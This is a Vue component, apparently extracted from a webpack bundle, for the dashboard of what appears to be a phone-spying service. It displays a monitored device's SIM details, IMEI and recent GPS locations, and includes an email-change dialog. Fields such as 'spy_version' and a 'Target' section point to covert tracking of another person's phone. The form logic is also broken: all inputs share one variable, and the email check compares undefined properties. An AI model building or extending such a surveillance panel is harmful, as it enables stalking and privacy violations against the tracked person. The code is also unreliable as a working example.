<template>
	<div class="fff">
		<div style="overflow: hidden">
			<div class="tl kkkk">
				<div class="smallTitle">{{$t('simcard.txt1')}}</div>
				<div class="system">
					<div class="a_li">
						{{$t('simcard.txt2')}}<span>{{ systems.operator_name }}</span>
					</div>
					<div class="a_li">
						{{$t('simcard.txt3')}}<span>{{ systems.mobile }}</span>
					</div>
					<div class="a_li">
						{{$t('simcard.txt4')}}<span>{{ systems.mnc }}</span>
					</div>
					<div class="a_li">
						{{$t('simcard.txt5')}}<span>{{ systems.mcc }}</span>
					</div>
					<div class="a_li">
						{{$t('simcard.txt6')}}<span>{{ systems.imei }}</span>
					</div>
				</div>
			</div>
			<div class="tr kkkk">
				<div class="smallTitle">{{$t('simcard.txt7')}}</div>
				<div class="system">
					<img src="@/assets/img/e.png" />
					<p>
						{{$t('simcard.txt8')}}
						<br />
						<br />
						{{$t('simcard.txt9')}}<br />
						<br />
					</p>
					<!-- @click="dialogFormVisible = true" -->
					<a @click="goSettingPage" style="cursor:pointer;">{{  $t('Click here to change')  }}</a>
				</div>
			</div>
		</div>
		<div class="Target kkkk" style="margin-bottom: 50px; padding-bottom: 30px">
			<div class="smallTitle">{{$t('simcard.txt10')}}</div>
			<div style="width: 100%; height: 360px">
				<div id="map">
					<lastMap></lastMap>
				</div>
				<div id="mapr">
					<div class="mapr_li" v-for="(val, key) in map" :key="key">
						<div></div>
						<div class="txtHidden">{{ val.address }}</div>
						<div>{{ val.createtime }}</div>
					</div>
					<router-link to="GPS"> {{$t('simcard.txt11')}} </router-link>
				</div>
			</div>
		</div>
		<el-dialog title="Change email" :visible.sync="dialogFormVisible">
			<el-form :model="form">
				<el-form-item :label-width="formLabelWidth">
					<el-input :placeholder="$t('Enter New Email')" v-model="input1">
						<template slot="prepend">{{$t('simcard.txt12')}}</template>
					</el-input>
				</el-form-item>
				<el-form-item :label-width="formLabelWidth">
					<el-input :placeholder="$t('Re-Enter New Email')" v-model="input1">
						<template slot="prepend">{{$t('simcard.txt13')}}</template>
					</el-input>
				</el-form-item>
				<el-form-item :label-width="formLabelWidth">
					<el-input :placeholder="$t('Enter Current Password')" v-model="input1">
						<template slot="prepend">{{$t('simcard.txt14')}}</template>
					</el-input>
				</el-form-item>
			</el-form>
			<div slot="footer" class="dialog-footer">
				<el-button @click="dialogFormVisible = false">{{$t('simcard.txt15')}}</el-button>
				<el-button type="primary" @click="getemail()">{{$t('simcard.txt16')}}</el-button>
			</div>
		</el-dialog>
	</div>
</template>

<script>
import { lastgps, indexAccountInfo, changeemail } from '@/api/user';
import lastMap from './lastMap';
export default {
	name: 'HelloWorld',
	components: {
		lastMap,
	},
	data() {
		return {
			map: [],
			dialogFormVisible: false,
			formLabelWidth: 120,
			input1: null,
			systems: {
				vip_endtime: '',
				name: '',
				is_auto_renewal: 0,
				device_model: '',
				internet: '',
				Android_version: '',
				spy_version: '',
				battery: '',
			},
			form: {
				email2: '',
				email: '',
				pwd: '',
			},
			msg: '',
		};
	},
	mounted() {
		lastgps({ equipment_id: localStorage.getItem('systemId') }).then(asd => {
			this.map = asd.data;
		});
		indexAccountInfo({ equipment_id: localStorage.getItem('systemId') }).then(
			adj => {
				this.systems = adj.data.vipinfo;
			}
		);
	},
	methods: {
		getemail() {
			if (this.email2 === this.email) {
				changeemail(this.form).then(adj => {
					this.systems = adj.data.vipinfo;
					this.dialogFormVisible = false;
				});
			}
		},
		goSettingPage(){
			this.$router.push({ name: 'Setting', params: { isshow: 2 } })
		},
	},
};
</script>

<!-- Add "scoped" attribute to limit CSS to this component only -->
<style scoped>
.kkkk {
	background: #fff;
	box-shadow: 0 4px 12px -4px rgba(122, 138, 153, 0.2);
	border-radius: 12px;
	margin-top: 20px;
	padding-bottom: 0;
}
.txtHidden{
	overflow: hidden;
	text-overflow: ellipsis;
	display: -webkit-box;
	-webkit-box-orient: vertical;
	-webkit-line-clamp: 1;
}
.tl {
	margin: 20px 0 0 1.5%;
	width: 38%;
	float: left;
	height: 240px;
}
.Account {
	width: 100%;
	border-top: 1px solid #e1e3e6;
}
.a_li {
	font-size: 14px;
	color: #3f3f3f;
	margin-top: 10px;
	line-height: 20px;
	text-indent: 20px;
	overflow: hidden;
}
.a_li span {
	float: right;
	text-align: right;
	color: #9f9f9f;
	margin-right: 20px;
	font-weight: 400;
}
.YorN {
	float: right;
	margin-right: 20px;
	width: 44px;
	height: 22px;
	background: #00eec3;
	border-radius: 11px;
	overflow: hidden;
	cursor: pointer;
}
.YorN div {
	width: 18px;
	height: 18px;
	border-radius: 9px;
	float: left;
	background: #fff;
	margin: 2px 2px 2px 24px;
}
.YorN.no {
	background: #999;
}
.YorN.no div {
	margin-left: 2px;
}
.Renewal {
	width: 188px;
	height: 36px;
	line-height: 36px;
	margin-top: 25px;
	font-size: 15px;
}
.tr {
	margin: 20px 0 0 1.5%;
	width: 57%;
	float: left;
	height: 240px;
}
.system {
	width: 94%;
	margin-left: 3%;
	float: left;
	border: 1px solid #e1e3e6;
	border-radius: 12px;
	height: 165px;
}
.system p {
	font-size: 13px;
	color: #3f3f3f;
}
.system a {
	font-size: 14px;
	color: #0080ff;
	float: left;
}
.tl .system {
	width: 90%;
	margin-left: 5%;
	float: left;
	border: 1px solid #e1e3e6;
	border-radius: 12px;
	height: 165px;
}
.system img {
	float: left;
	display: block;
	width: 40px;
	height: 40px;
	margin: 20px 20px 100%;
}
.system .a_li {
	font-size: 13px;
}
.Target {
	width: 97%;
	margin: 20px 1.5% 0;
}
.cl {
	float: left;
	width: 31.33%;
	margin-left: 1.5%;
}
.kkk_ul {
	width: 90%;
	margin: 0 auto;
	overflow: hidden;
	background: #f6f8fa;
	border-radius: 12px;
	padding: 5px 0 20px;
}
.kkk_ul .kkk_li {
	float: left;
	width: 50%;
	height: 40px;
	line-height: 20px;
	margin-top: 15px;
}
.kkk_img {
	float: left;
	width: 12px;
	height: 12px;
	background: #4995ef;
	border-radius: 50%;
	margin: 14px 10px 0 20px;
}
.kk_title {
	font-size: 13px;
	color: #000927;
}
.kk_ftitle {
	font-size: 12px;
	color: #b4b5b8;
}
.AllMessages {
	height: 54px;
	display: block;
	width: 100%;
	line-height: 54px;
	font-size: 14px;
	color: #0080ff;
	text-align: center;
	font-weight: 400;
}
#map {
	width: 58.5%;
	margin-left: 1.5%;
	height: 360px;
	background-color: #999;
	border-radius: 12px;
	float: left;
}
#mapr {
	float: left;
	width: 36%;
	margin-left: 2%;
	font-size: 14px;
	height: 100%;
}
.mapr_li {
	overflow: hidden;
	width: 100%;
	margin-bottom: 20px;
}
.mapr_li div:first-child {
	float: left;
	width: 8px;
	height: 8px;
	border-radius: 50%;
	background: #0cd4b0;
	margin: 6px 8px 20px 0;
}
.mapr_li div:first-child + div {
	font-size: 13px;
	line-height: 20px;
}
.mapr_li div:first-child + div + div {
	font-size: 12px;
	color: #b4b5b8;
}
#mapr a {
	font-size: 14px;
	color: #0080ff;
	text-align: center;
	font-weight: 400;
}
</style>



// WEBPACK FOOTER //
// src/components/SimCard.vue